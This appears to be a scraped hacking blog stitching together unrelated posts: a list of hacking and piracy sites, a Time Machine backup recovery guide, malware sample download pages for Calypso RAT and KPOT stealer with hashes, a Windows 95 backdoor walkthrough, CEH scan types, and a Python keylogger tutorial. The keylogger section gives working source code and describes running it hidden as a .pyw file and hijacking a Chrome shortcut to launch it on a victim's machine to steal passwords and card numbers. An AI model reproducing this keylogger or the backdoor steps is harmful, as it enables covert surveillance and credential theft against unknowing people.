12 Useful Websites for Hackers

  • Packet Storm: Information Security Services, News, Files, Tools, Exploits, Advisories and Whitepapers.
  • Exploit DB: An archive of exploits and vulnerable software by Offensive Security. The site collects exploits from submissions and mailing lists and concentrates them in a single database.
  • Hakin9: E-magazine offering in-depth looks at both attack and defense techniques and concentrates on difficult technical issues.
  • KitPloit: Leading source of Security Tools, Hacking Tools, CyberSecurity and Network Security.
  • Phrack Magazine: Digital hacking magazine.
  • NFOHump: Offers up-to-date .NFO files and reviews on the latest pirate software releases.
  • SecTools.Org: List of 75 security tools based on a 2003 vote by hackers.
  • Metasploit: Find security issues, verify vulnerability mitigations & manage security assessments with Metasploit. Get the worlds best penetration testing software now.
  • The Hacker News: The Hacker News — most trusted and widely-acknowledged online cyber security news magazine with in-depth technical coverage for cybersecurity.
  • SecurityFocus: Provides security information to all members of the security community, from end users, security hobbyists and network administrators to security consultants, IT Managers, CIOs and CSOs.
  • HackRead: HackRead is a News Platform that centers on InfoSec, Cyber Crime, Privacy, Surveillance, and Hacking News with full-scale reviews on Social Media Platforms.
  • Hacked Gadgets: A resource for DIY project documentation as well as general gadget and technology news.

Recovering Data From An Old Encrypted Time Machine Backup

Recovering data from a backup should be an easy thing to do. At least this is what you expect. Yesterday I had a problem which should have been easy to solve, but it was not. I hope this blog post can help others who face the same problem.


The problem

1. I had an encrypted Time Machine backup which was not used for months
2. This backup was not on an official Apple Time Capsule or on a USB HDD, but on a WD MyCloud NAS
3. I needed files from this backup
4. After running out of time I only had SSH access to the macOS, no GUI

The struggle

By default, Time Machine is one of the best and easiest backup solution I have seen. As long as you stick to the default use case, where you have one active backup disk, life is pink and happy. But this was not my case.

As always, I started to Google what shall I do. One of the first options recommended that I add the backup disk to Time Machine, and it will automagically show the backup snapshots from the old backup. Instead of this, it did not show the old snapshots but started to create a new backup. Panic button has been pressed, backup canceled, back to Google.


Other tutorials recommend to click on the Time Machine icon and pressing alt (Option) key, where I can choose "Browse other backup disks". But this did not list the old Time Machine backup. It did list the backup when selecting disks in Time Machine preferences, but I already tried and failed that way.


YAT (yet another tutorial) recommended to SSH into the NAS, and browse the backup disk, as it is just a simple directory where I can see all the files. But all the files inside where just a bunch of nonsense, no real directory structure.

YAT (yet another tutorial) recommended that I can just easily browse the content of the backup from the Finder by double-clicking on the sparse bundle file. After clicking on it, I can see the disk image on the left part of the Finder, attached as a new disk.
Well, this is true, but because of some bug, when you connect to the Time Capsule, you don't see the sparse bundle file. And I got inconsistent results, for the WD NAS, double-clicking on the sparse bundle did nothing. For the Time Capsule, it did work.
At this point, I had to leave the location where the backup was present, and I only had remote SSH access. You know, if you can't solve a problem, let's complicate things by restrict yourself in solutions.

Finally, I tried to check out some data forensics blogs, and besides some expensive tools, I could find the solution.

The solution

Finally, a blog post provided the real solution - hdiutil.
The best part of hdiutil is that you can provide the read-only flag to it. This can be very awesome when it comes to forensics acquisition.


To mount any NAS via SMB:
mount_smbfs afp://<username>@<NAS_IP>/<Share_for_backup> /<mountpoint>

To mount a Time Capsule share via AFP:
mount_afp afp://any_username:password@<Time_Capsule_IP>/<Share_for_backup> /<mountpoint>

And finally this command should do the job:
hdiutil attach test.sparsebundle -readonly

It is nice that you can provide read-only parameter.

If the backup was encrypted and you don't want to provide the password in a password prompt, use the following:
printf '%s' 'CorrectHorseBatteryStaple' | hdiutil attach test.sparsebundle -stdinpass -readonly

Note: if you receive the error "resource temporarily unavailable", probably another machine is backing up to the device

And now, you can find your backup disk under /Volumes. Happy restoring!

Probably it would have been quicker to either enable the remote GUI, or to physically travel to the system and login locally, but that would spoil the fun.

Continue reading


APT Calypso RAT, Flying Dutchman Samples



Reference


 Attackers exploit Windows SMB vulnerability CVE-2017-0143 or use stolen credentials to gain access, deploy the custom Calypso RAT and use it to upload other tools such as Mimikatz, EternalBlue and EternalRomance. They move laterally and steal data.




Download

             Other malware




Hashes




MD5SHA256SHA1FilenameFile TyeeStage
aa1cf5791a60d56f7ae6da9bb1e7f01ed5afa3bfd423ba060207ad025467feaa56ac53d13616ac8782a7f63c9fc0fdb4bdd8b9115d1ae536d0ea1e62052485e5ad10761fMPSSVC.dllpe dllCalypso RAT Payload
1e765fed294a7ad082169819c95d2c85f6a09372156a8aef96576627a1ed9e57f194b008bb77e32ca29ac89505f933f060dda7ccd9ae00701046923b619a1b9c33c8e2acWscntfy.exepe exeCalypso RAT Dropper
17e05041730dcd0732e5b296db16d757b6c21c26aef75ad709f6c9cfa84bfa15b7ee709588382ce4bc3544a04bceb661f3301405d8ad5b160747241d6b2a8d88bf6292e8pe exeCalypso RAT Dropper
1ed72c14c4aab3b66e830e16ef90b37beebff21def49af4e85c26523af2ad659125a07a09db50ac06bd3746483c89f9ddc0d0a34f107d140d9e47582e17a7fec945403eacoal.exepe exeCalypso RAT Dropper
e24a62d9826869bc4817366800a8805cc407c3dde18c9b56ed24492ca257d77a570616074356b8c7854a080823f7ee1753791c9e7c41931a6becb999fee4eb7daf9b1a11data01.binpe dllCalypso RAT Dropper
c9c39045fa14e94618dd631044053824ab39301d45045172ad41c9a89210fdc6f0d3f9dccb567fd733b0dbffbfcfbcc31cda28bc307c09508dbb1f3495a967bbcc29326epe exeCalypso RAT Dropper
69322703b8ef9d490a20033684c28493e6a3b43acdaa824f3280095b10798ea341839f7d43f0460df8989f13c98fa6e0f203680d97705d99f92fe9797691be6177f5fd41RasCon.dllpe dllCalypso RAT Dropper
85ce60b365edf4beebbdd85cc971e84d5dfdee5dd680948d19ab4d16df534cf10aca5fa0b157c59659d6517fe897c62fd9c14f7b6de8e26ae33e41a72ae8e35bb1af4434pe exeCalypso RAT Dropper
6347e42f49a86aff2dea7c8bf455a52a281583aca23f8fd8745dd88a600cbfc578d819859a13957ec022b86c3c1c99f48b2a81af85590e0e36efc1c05aa4f0600ea21545HIDMgr.dllpe dllCalypso RAT Dropper
cb914fc73c67b325f948dd1bf97f57330031c7b63c1e1cd36d55f585d97e2b21a13a19858d5a1aa5455e5cc64b41e6e937ce4d0a3168e3b2f80b3fae38082e68a454aee0pe exeCalypso RAT Dropper
c84df4b2cd0d3e7729210f15112da7ac4e8351ddaff18f7df6fcc27a3c75598e0c56d3b406818d45effb4e78616092c241a0c5a1aad36f405c8755613c732591e3300f97mscorsvw.dllpe dllCalypso RAT Dropper
5199ef9d086c97732d97eddef56591ec511683c8ee62478c2b45be1f782ce678bbe03c4349a1778651414803010b3ee9d19a786adc09dff84642f2c2e0386193fa2a914bdnscache.dllpe dllFlyingDutchman
06c1d7bf234ce99bb14639c194b3b318a9a82099aa812d0c4025bee2b34f3b34c1d102773e36f1d50648815913dbe03d464ab9e11d371bf24de46c98c295d4afe7e957c1fromResource.exepedllFlyingDutchman
617d588eccd942f243ffa8cb13679d9c0664b09a86ec2df7dfe01a93e184a1fa23df66ea82cab39000944e418ec1f7b21b043fdcb582ed13cbf7dabcef6527762b5be93cpe dllHussar
2807236c2d905a0675878e530ed8b1f8314e438198f8cc2ee393c75f8e9f2ebd2b5133fd6f2b7deb1178f82782fc63302f6fe857632a67e87f4f3631bfa93713ccdf168aAeLookupMgr.dllpe dllCalypso RAT Payload
cce8c8ee42feaed68e9623185c3f7fe438cc404437b936660066b71cc87a28af1995248d6d4c471706eb1dd347129b4b9d2235c911b86bb6ad55d953a2f56ea78c5478e5AppCert.dll.crtCalypso RAT Payload
e1a578a069b1910a25c95e2d9450c710413622ded5d344a5a78de4fea22cfdabdeb4cdccf69e9a1f58f668096c32473836087a5b0809dc3f9dc5a77355a88e99af491a88RasCfgMan.dll.crtCalypso RAT Payload
0d532484193b8b098d7eb14319cefcd3f8043d6bfc3e63d8561f7f74e65cb7ff1731577ecf6c7559795d9de21298f0fc31f4c6dc6ce78b4e0439b30c830dfd5d9a3fc4feRasCfgMan.dllpe dllCalypso RAT Payload
974298eb7e2adfa019cae4d1a927ab070461710e681fd6dc9f1c83b57f94a88cd6df9e6432174cbfdd70dfd24577a0f841bc37679ce3caeecc176d10b4f8259918e25807VirtualUMP.dll.crtCalypso RAT Payload
05f472a9d926f4c8a0a372e1a71939988017923cd8169bf951106f053408b425f1eb310a9421685638ead55bb3823db38d909bd3450ebe0cffd0cb17b91bc28d23ef5083EFSProvider.dll.crtCalypso RAT Payload
d1a1166bec950c75b65fdc7361dcdc63f3f38c097b0cc5337b7d2dbec098bf6d0a3bb4a3e0336e7b1c8af75268a0a49d5731350f68a74fb4762c4ea878ecff635588a825RasCon.dllpe dll 64bits assemblyCalypso RAT Payload
e3e61f30f8a39cd7aa25149d0f8af5efc4dc7519bccc24c53794bf9178e4a4d0823875c34479d01cedbb3e9b10f5c7301b75ea494c3ac171c5177bdcc263b89a3f24f207MPSSVC.dllpe dllCalypso RAT Payload
More information
  1. Pentest Tutorial
  2. Pentest Network
  3. Hacker Google
  4. Hacking Typer
  5. Hackintosh
  6. Pentest Tutorial
  7. Pentest Network

Hacking Windows 95, Part 2

In the Hacking Windows 95, part 1 blog post, we covered that through a nasty bug affecting Windows 95/98/ME, the share password can be guessed in no time. In this article, I'm going to try to use this vulnerability to achieve remote code execution (with the help of publicly available tools only).

The first thing we can do when we have read access to the Windows directory through the share, is to locate all the *.pwl files on the c:\windows directory, copy them to your machine where Cain is installed, switch to Cracker tab, pwl files, load the pwl file, add username based on the filename, and try to crack it. If you can't crack it you might still try to add a .pwl file where you already know the password in the remote windows directory. Although this is a fun post-exploitation task, but still, no remote code execution. These passwords are useless without physical access.


One might think that after having a share password and user password, it is easy to achieve remote code execution. The problem is:
  • there is no "at" command (available since Windows 95 plus!)
  • there is no admin share
  • there is no RPC
  • there is no named pipes
  • there is no remote registry
  • there is no remote service management
If you think about security best practices, disabling unnecessary services is always the first task you should do. Because Windows 95 lacks all of these services, it is pretty much secure!

During my quest for a tool to hack Windows 95, I came across some pretty cool stuff:
LanSpy

But the best of the best is Fluxay, which has been written by chinese hackers. It is the metasploit from the year 2000. A screenshot is worth more than a 1000 words. 4 screenshot > 4 thousand words :)





It is pretty hard to find the installer, but it is still out there!

But at the end, no remote code execution for me.

My idea here was that if I can find a file which executes regularly (on a scheduled basis), I can change that executable to my backdoor and I'm done. Although there is no scheduler in the default Windows 95, I gave it a try. 

Let's fire up taskman.exe to get an idea what processes are running:


Looks like we need a more powerful tool here, namely Process Explorer. Let's try to download this from oldapps.com:


LOL, IE3 hangs, can't render the page. Copying files to the Win95 VM is not that simple, because there are no shared folders in Win95 VM. And you can't use pendrives either, Win95 can't handle USB (at least the retail version). After downloading the application with a newer browser from oldapps, let's start Process Explorer on the test Windows 95.


Don't try to download the Winsocks 2 patch from the official MS site, it is not there anymore, but you can download it from other sites

Now let's look at the processes running:


After staring it for minutes, turned out it is constant, no new processes appeared.
Looking at the next screenshot, one can notice this OS was not running a lot of background processes ...


My current Win7 has 1181 threads and 84 processes running, no wonder it is slow as hell :)

We have at least the following options:
  1. You are lucky and not the plain Windows 95 is installed, but Windows 95 Plus! The main difference here is that Windows 95 Plus! has built-in scheduler, especially the "at" command. Just overwrite a file which is scheduled to execution, and wait. Mission accomplished!
  2. Ping of death - you can crash the machine (no BSOD, just crash) with long (over 65535 bytes) ICMP ping commands, and wait for someone to reboot it. Just don't forget to put your backdoor on the share and add it to autoexec.bat before crashing it. 
  3. If your target is a plain Windows 95, I believe you are out of luck. No at command, no named pipes, no admin share, nothing. Meybe you can try to fuzz port 137 138 139, and write an exploit for those. Might be even Ping of Death is exploitable?
Let's do the first option, and hack Windows 95 plus!
Look at the cool features we have by installing Win95 Plus!


Cool new boot splash screen!


But our main interest is the new, scheduled tasks!


Now we can replace diskalm.exe with our backdoor executable, and wait maximum one hour to be scheduled.

Instead of a boring text based tutorial, I created a YouTube video for you. Based on the feedbacks on my previous tutorialz, it turned out I'm way too old, and can't do interesting tutorials. That's why I analyzed the cool skiddie videoz, and found that I have to do the followings so my vidz won't suck anymore:
  • use cool black windows theme
  • put meaningless performance monitor gadgets on the sidebar
  • use a cool background, something related with hacking and skullz
  • do as many opsec fails as possible
  • instead of captions, use notepad with spelling errorz
  • there is only one rule of metal: Play it fuckin' loud!!!!
Related articles

KPOT Info Stealer Samples


KPOT Stealer is a "stealer" malware that focuses on stealing account information and other data from various software applications and services

References

1.  2020-04-19 Didier Stevens posted analysis of KPOT infostealer on the Infosec Handlers Diary blog "KPOT Analysis: Obtaining the Decrypted KPOT EXE"
These are samples to follow his analysis routine.

2. 2019-05-09 Proofpoint. New KPOT v2.0 stealer brings zero persistence and in-memory features to silently steal credentials


Download

             Other malware




Download. Email me if you need the password (see in my profile)




Hashes

1. From Didier Stevens' post

MD5  56ad7b243511ee7398d43df7643dc904
SHA-1  ae5ab7798ca267b1265a0496c562f219821d17cf
SHA-256  3fd4aa339bdfee23684ff495d884aa842165e61af85fd09411abfd64b9780146

2. From Proofpoint

MD5 7d7667ddce8fd69a0fd50bb08c287d10
SHA-1 087fc3e9a082983ee6a2b25f0ccb09eb723e0f39

SHA-256 67f8302a2fd28d15f62d6d20d748bfe350334e5353cbdef112bd1f8231b5599d

MD5 45ddc687f88b45fc3fec79f9dc8b38e2
SHA-1 de37b748e0e32d96c31f469f9ba4ea4f11e3e78b
SHA-256 36dcd40aee6a42b8733ec3390501502824f570a23640c2c78a788805164f77cecontagio.deependresearch.org/crime/kpotstealer(proofpoint)_win_samp.zip
More info

CEH: Gathering Network And Host Information, Types Of Scan


In Hacking the main focus is over gathering the information about victim or victim's machine. Which will help to find out which type of exploit will works according to the given circumstances. Gathering the network and host information means to find out by which network, the which victim's machine is connected and communicating over the network. Moreover, scanning is also performed for gathering information about open and closed ports. After that they'll able to find the vulnerabilities in the target system and try to get access to the system.

Types Of Scan

As a CEH you should know the scan types and uses:

SYN

SYN scan doesn't complete the TCP three way handshake that is why it is known as a half-open scan. An attacker send a SYN packet to the victim machine if SYN/ACK packet is received back to attacker, then it clarify that the port is listening due to the acknowledgment by the victim that it has completed the connection. While if the attacker is received the RST/ACK packet then it assumed that the port is closed or open.


XMAS

XMAS scan works only on target system that has the RFC 793 development of TCP/IP and it doesn't works against any version of windows.
XMAS scan send a packet with by setting up the FIN, URG and PSH flags of the TCP header. The function of this scan is if the port is active there will be no response but if the port is closed the target responds with a RST/ACK packet.


FIN

A FIN scan send a packet by setting up only the FIN flag of the TCP. This scan is similar to XMAS scan. FIN scan receives no response if the port is active while if the port is closed it receives the RST/ACK packet.


NULL 

NULL scan is also similar to the XMAS scan. But the only difference is that it sends a packet without setting up the any flag of TCP header. NULL scan receives no response if the port is open but if the port is closed it receives the RST/ACK packet.


IDLE

It is just like spoofing an IP address by sending a SYN packet to the victim's machine to find out which services are available over the system. This scan is completed with the help of another system called as "Zombie" (that is not receiving or transmitting any information).


Related posts

How To Make A Simple And Powerful Keylogger Using Python

A keylogger is a computer program which can be written using any computer programming language such as c++ when you install it on a Victim system it can keep the records of every keystroke in a text file. Keylogger is mainly used to steal confidential data such as passwords, credit card numbers etc.

How to make a python keylogger?

A keylogger can be programmed using any programming language such as c++, java, c# e.tc. For this tutorial, I will use python to make a keylogger, because python is flexible, powerful and simple to understand even a non-programmer can use python to make a keylogger.
Requirements to create a python keylogger
  • Computer With Operating system: Windows, Mac os or Linux
  • Python must be installed on the system
  • Pip (Python index package ) you will need this to install python software packages.
  • Pypiwin32 and PyHook packages
  • Basic understanding of computers
You will learn to install these things one by one. If you have already installed and configured the python development kit feel free to skip Part 1.
Part 1: Downloading Python and pip, setting up the environment to create the keylogger.Step 1:
Download python development kit by clicking here.
Choose python 2.7 because I am using this version. It is ok if you have a different version of python this method will work on every version of python.
Step 2:
Installation of python is pretty simple.Open the python setup file, Mark the checkboxes Very important else you have to set the python path manually, and click on Install Now.
Step 3:
You need Pypiwin32 and PyHook python packages to create python keylogger. To install these packages you need pip, you can install Pypiwin32 and PyHook without using pip which is not recommended.
To download pip go to https://pip.pypa.io/en/stable/installing/ and Save link as by right clicking on get-pip.py. when the download is done, just run the get-pip.py file.
Now you need to set the Variable path for pip to do this right click on the computer icon and choose properties.
Now click on the Advanced system settings
Choose Environment Variables.
Choose New, Set the Variable name: PATH and Variable value as C:\Python27\Scripts
Click on ok.
Part 2: Installing Pypiwin32 and PyHook python Packages using pip:
Open Command Prompt(CMD) and type: pip installs Pypiwin32 press the Enter Key, wait for the installation to complete. After the Pypiwin32 package installation type: pip install PyHook press the Enter Key and wait for the installation to complete.When done close the Command Prompt.
Part 3: Creating and testing the python keylogger:
Now you have configured your environment and installed all the necessary packages, let's start creating the keylogger. Click on the start menu and scroll down until you find Python 2.7, run python IDLE(GUI) by clicking on it.
Go to the File, from the drop-down menu choose New file.

Python Keylogger source code:

Copy these lines of code and paste into the new file. Modify the directory in the second line of code to your own location e.g 'C:\test\log.txt' this will create a folder named test in C save the log.txt file there when the Keylogger start.
import pyHook, pythoncom, sys, logging
file_log='F:\\test\\log.txt'
def onKeyboardEvent(event):
logging.basicConfig(filename=file_log,level=logging.DEBUG,format='%(message)s')
chr(event.Ascii)
logging.log(10,chr(event.Ascii))
return True
hooks_manager=pyHook.HookManager()
hooks_manager.KeyDown=onKeyboardEvent
hooks_manager.HookKeyboard()
pythoncom.PumpMessages()
Save your file as a test.pyw at any location you want, the .pyw extension is very important because of it the python keylogger will run in the background without notifying the user.
The Python Keylogger is now completed you can test it out by opening it and typing some text in your browser, go to the log.txt file which is in the F:\test\log.txt on my PC. You will find your log.txt file in C:\test\log.txt.But what if you want to test it on someone else computer? you want to run it without the user knowing that it has been launched, this can be done by attaching it to the program that the victim always uses such as Google Chrome.
Let's make the python keylogger auto-launchable by attaching it the Google Chrome.
Copy the following code and paste into notepad. Save it by giving .bat extension e.g launch.bat in a hidden location, e.g c:\test\launch.bat
Now right click on the google chrome desktop shortcut icon and click on properties. You will see a field called Target. Change the target field to the batch file launch.bat directory that you created. let's say you have saved your launch.bat file in a test folder in C, Then change the target field with "C:\test\launch.bat". Now, whenever the user opens chrome the keylogger will run automatically.

More articles


  1. Hacker Lab
  2. Pentest Methodology
  3. Pentest
  4. Pentest+ Vs Ceh
  5. Pentest Blog
  6. Pentest As A Service